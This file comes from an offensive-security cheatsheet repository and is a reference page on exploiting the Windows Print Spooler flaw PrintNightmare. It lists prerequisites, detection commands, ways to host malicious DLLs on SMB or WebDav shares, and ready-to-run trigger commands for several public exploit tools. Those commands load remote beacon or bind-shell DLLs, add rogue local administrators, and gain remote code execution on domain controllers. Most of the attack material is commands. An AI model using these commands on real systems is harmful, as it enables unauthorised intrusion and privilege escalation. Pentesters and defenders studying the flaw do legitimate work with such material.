daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

printnightmare.md (5225B)


      1 ---
      2 title: "PrintNightmare"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/CVE/PrintNightmare.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/PrintNightmare.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # PrintNightmare
     12 
     13 > CVE-2021-1675 / CVE-2021-34527
     14 
     15 The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
     16 The exploit will execute the DLL either from the local filesystem or a remote share.
     17 
     18 Requirements:
     19 
     20 * **Spooler Service** enabled (Mandatory)
     21 * Server with patches < June 2021
     22 * DC with `Pre Windows 2000 Compatibility` group
     23 * Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1
     24 * Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0
     25 
     26 **Detect the vulnerability**:
     27 
     28 * Impacket - [impacket/rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
     29 
     30   ```ps1
     31   python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
     32   Protocol: [MS-RPRN]: Print System Remote Protocol
     33   ```
     34 
     35 * [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream)
     36 
     37   ```ps1
     38   cd ItWasAllADream && poetry install && poetry shell
     39   itwasalladream -u user -p Password123 -d domain 10.10.10.10/24
     40   docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10
     41   ```
     42 
     43 **Payload Hosting**:
     44 
     45 * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109):
     46 
     47   ```ps1
     48   python3 ./smbserver.py share /tmp/smb/
     49   ```
     50 
     51 * Using [3gstudent/Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host):
     52 
     53   ```ps1
     54   Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
     55   ```
     56 
     57 * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights):
     58 
     59   ```ps1
     60   SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
     61   ```
     62 
     63 When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll`
     64 WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
     65 
     66 ```ps1
     67 nxc smb -u user -p password -d domain.local -M webdav [TARGET]
     68 ```
     69 
     70 **Trigger the exploit**:
     71 
     72 * [cube0x0/SharpNightmare](https://github.com/cube0x0/CVE-2021-1675)
     73 
     74   ```powershell
     75   # require a modified Impacket: https://github.com/cube0x0/impacket
     76   python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
     77   python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
     78   ## LPE
     79   SharpPrintNightmare.exe C:\addCube.dll
     80   ## RCE using existing context
     81   SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
     82   ## RCE using runas /netonly
     83   SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll'  'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
     84   ```
     85 
     86 * [calebstewart/Invoke-Nightmare](https://github.com/calebstewart/CVE-2021-1675)
     87 
     88   ```powershell
     89   ## LPE only (PS1 + DLL)
     90   Import-Module .\cve-2021-1675.ps1
     91   Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
     92   Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" 
     93   Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
     94   ```
     95 
     96 * [gentilkiwi/mimikatz v2.2.0-20210709+](https://github.com/gentilkiwi/mimikatz/releases)
     97 
     98   ```powershell
     99   ## LPE
    100   misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll
    101   ## RCE
    102   misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50
    103   ```
    104 
    105 * [outflanknl/PrintNightmare](https://github.com/outflanknl/PrintNightmare)
    106 
    107   ```powershell
    108   PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]
    109   ```
    110 
    111 **Debug informations**
    112 
    113 | Error  | Message               | Debug                                    |
    114 |--------|-----------------------|------------------------------------------|
    115 | 0x5    | `rpc_s_access_denied` | Permissions on the file in the SMB share |
    116 | 0x525  | `ERROR_NO_SUCH_USER`  | The specified account does not exist.    |
    117 | 0x180  | unknown error code    | Share is not SMB2                        |
    118 
    119 ## References
    120 
    121 * [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
    122 * [A Practical Guide to PrintNightmare in 2024 - itm4n - Jan 28, 2024](https://itm4n.github.io/printnightmare-exploitation/)